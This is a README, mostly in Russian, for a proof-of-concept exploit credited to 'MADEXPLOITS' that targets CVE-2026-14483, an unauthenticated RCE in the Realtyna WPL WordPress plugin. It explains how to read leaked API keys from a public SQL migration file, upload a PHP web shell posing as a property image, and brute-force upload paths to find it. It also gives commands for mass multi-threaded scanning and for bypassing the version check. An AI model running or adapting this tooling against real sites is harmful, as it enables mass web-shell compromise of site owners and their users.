
CVE-2026-14483 POC EXPLOIT BY MADEXPLOITS
Удалённое выполнение кода без аутентификации в WordPress-плагине Realtyna WPL Real Estate Listing.
| Поле | Детали |
|---|
| CVE | CVE-2026-14483 |
| Затронутая версия | <= 5.2.0 |
| Плагин | real-estate-listing-realtyna-wpl |
| Воздействие | Загрузка PHP-веб-шелла без аутентификации (RCE) |
| Скрипт | CVE-2026-14483.py |
| Автор | MADEXPLOITS |
По умолчанию скрипт только эксплуатирует цели, на которых работает WPL 5.2.0. Используйте
--force, чтобы отключить это ограничение.

api_key / api_secret по умолчанию раскрываются через публичный дамп SQL-миграции.set_property), что позволяет загрузить подготовленный PHP-файл в качестве изображения объекта недвижимости.wp-content/uploads/WPL/{property_id}/.pip install requests colorama
Создайте текстовый файл, в котором каждая строка содержит один базовый URL:
http://wplab.test
https://example.com
python CVE-2026-14483.py --targets targets.txt
URL найденных шеллов добавляются в result.txt (или в файл, указанный в --output).
python CVE-2026-14483.py \
--targets targets.txt \
--output result.txt \
--user-id 1 \
--max-id 1000 \
--timeout 30 \
--threads 5 \
--debug \
--force
| Аргумент | По умолчанию | Описание |
|---|---|---|
--targets | (обязательный) | Файл с базовыми URL (по одному на строку) |
--output | result.txt | Файл для добавления найденных URL шеллов |
--user-id | 1 | ID пользователя WordPress / WPL, которому принадлежит новый объект недвижимости |
--payload | встроенный загрузочный шелл | Строка с произвольной PHP-нагрузкой |
--max-id | 1000 | Максимальный ID объекта недвижимости для перебора при поиске шелла |
--timeout | 30 | Таймаут HTTP в секундах |
--threads | 5 | Количество параллельных рабочих потоков |
--debug | выкл. | Подробное отладочное логирование |
--force | выкл. | Эксплуатировать, даже если версия ≠ 5.2.0 или версию не удалось определить |
Target URL
│
▼
Detect WPL version (readme.txt / wpl.php)
│ skip unless == 5.2.0 (or --force)
▼
Fetch api_key + api_secret from:
/wp-content/plugins/real-estate-listing-realtyna-wpl/assets/migrations/basic/1.0.0.sql
│
▼
POST set_property via WPL I/O API
(upload image_0x89MADEXPLOITS.php as image/jpeg)
│
▼
Brute-force property ID 1..max-id
/wp-content/uploads/WPL/{id}/0x89MADEXPLOITS.php
│
▼
Write shell URL → output file
Маркер шелла по умолчанию: MADEXPLOITS
Удалённое имя файла по умолчанию: 0x89MADEXPLOITS.php
Одиночная лабораторная цель (это рабочее пространство):
echo http://wplab.test > targets.txt
python CVE-2026-14483.py --targets targets.txt --debug
Массовое сканирование с большим числом потоков:
python CVE-2026-14483.py --targets targets.txt --threads 20 --output shells.txt
Принудительная эксплуатация при сбое проверки версии:
python CVE-2026-14483.py --targets targets.txt --force
[+] Shell found: http://target/wp-content/uploads/WPL/32/0x89MADEXPLOITS.php
[*] Progress: 1/1 | Found: 1
[+] Done. Found 1 shell(s). Check 'result.txt' for URLs.
result.txt содержит по одному URL шелла на строку.
Stable tag: / Version: в readme.txt плагина, запасной вариант — wpl.php.--max-id.